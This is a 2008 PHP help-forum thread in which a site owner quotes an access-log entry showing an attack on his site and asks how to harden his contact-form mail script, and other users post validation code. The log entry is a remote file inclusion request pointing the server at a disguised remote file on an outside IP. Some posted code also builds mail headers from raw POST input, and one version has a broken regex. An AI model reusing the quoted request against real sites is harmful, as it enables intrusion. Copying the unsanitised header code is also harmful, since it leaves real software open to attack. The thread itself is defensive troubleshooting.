Jump to content

Recommended Posts

Hello :)

 

On my index page I have a contact form made in flash with a simple script file to send me the comments... I also have this guy who is trying to exploit my site for some reason..

 

Please, please, please can someone tell me how I can add code to my PHP script that will look for invalid parameters and redirect him off somewhere else...?

 

My log shows what is below:-

 

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

 

Many Thanks

Martin

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/
Share on other sites

Here is the contents of my script...

 

<?

// initialize variables for To and Subject fields

$to = 'me@myemail.com';

$subject = 'Enquiry';

 

// build message body from variables received in the POST array

$message = 'From: '.$_POST['firstname']."\n\n";

$message .= 'Email: '.$_POST['email']."\n\n";

$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

 

// add additional email headers for more user-friendly reply

$additionalHeaders = "From: Martin<me@myemail.com>\n";

$additionalHeaders .= "Reply-To:$_POST";

 

//send email message

$OK = mail($to, $subject, $message, $additionalHeaders);

?>

 

Thanks again..

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545573
Share on other sites

i don't see how

209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008

relates to that mail script!

 

 

try this, post the debug info and i'll adapt the script to suite

<?
//Debug: 
echo "DEBUG: GET";
echo count($_GET);
echo "<br>Post";
print_r($_POST);
echo "<br>End Debug";
//End debug

//the if below will need to be updated depending on the debug info.
if(count($_GET) >0 || count($_POST) != 3)
{
die("Bad Parameters");
}

if(empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']) )
{
die("Missing Parameters");
}

if (!preg_match('/\{(\w+)(?::\d+)?\}/', $_POST['email']))
{
die("Invalid Email");
}

// initialize variables for To and Subject fields
$to = 'me@myemail.com';
$subject = 'Enquiry';

// build message body from variables received in the POST array
$message = 'From: '.$_POST['firstname']."\n\n";
$message .= 'Email: '.$_POST['email']."\n\n";
$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

// add additional email headers for more user-friendly reply
$additionalHeaders = "From: Martin<me@myemail.com>\n";
$additionalHeaders .= "Reply-To:$_POST['email']"; //bug fix

//send email message
$OK = mail($to, $subject, $message, $additionalHeaders);
?>

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545579
Share on other sites

I used the file containing the debug information but the email did not send. When I switched it back it did.. I have an SMTP server set-up with only itself allowed to send emails, maybe the exploit is directly from the index.php page and not the form script (feedback.php)?

 

(Please note the index.php file doesn't contain code, it just contains the flash document which passes the variables to the script)

 

I'm sorry I know this is a pain! Argh!

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545593
Share on other sites

if index.php doesn't contains any php then i could be .html but personally i would keep it .php (you may add code to it later)

I used the file containing the debug information but the email did not send

 

i expected that, but the page should of displayed some debug data,

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545609
Share on other sites

okay just remove this

 

//Debug: 
echo "DEBUG: GET";
echo count($_GET);
echo "<br>Post";
print_r($_POST);
echo "<br>End Debug";
//End debug

//the if below will need to be updated depending on the debug info.
if(count($_GET) >0 || count($_POST) != 3)
{
die("Bad Parameters");
}

 

the reset should be fine

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545647
Share on other sites

full script

<?

if(empty($_POST['firstname']) || empty($_POST['email']) || empty($_POST['enquiry']) )
{
die("Missing Parameters");
}

if (!preg_match('/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i', $_POST['email']))
{
die("Invalid Email");
}

// initialize variables for To and Subject fields
$to = 'me@myemail.com';
$subject = 'Enquiry';

// build message body from variables received in the POST array
$message = 'From: '.$_POST['firstname']."\n\n";
$message .= 'Email: '.$_POST['email']."\n\n";
$message .= 'Enquiry: '.$_POST['enquiry']."\n\n";

// add additional email headers for more user-friendly reply
$additionalHeaders = "From: Martin<me@myemail.com>\n";
$additionalHeaders .= "Reply-To:$_POST['email']"; //bug fix

//send email message
$OK = mail($to, $subject, $message, $additionalHeaders);
?>

Link to comment
https://forums.phpfreaks.com/topic/106444-my-server-security/#findComment-545689
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.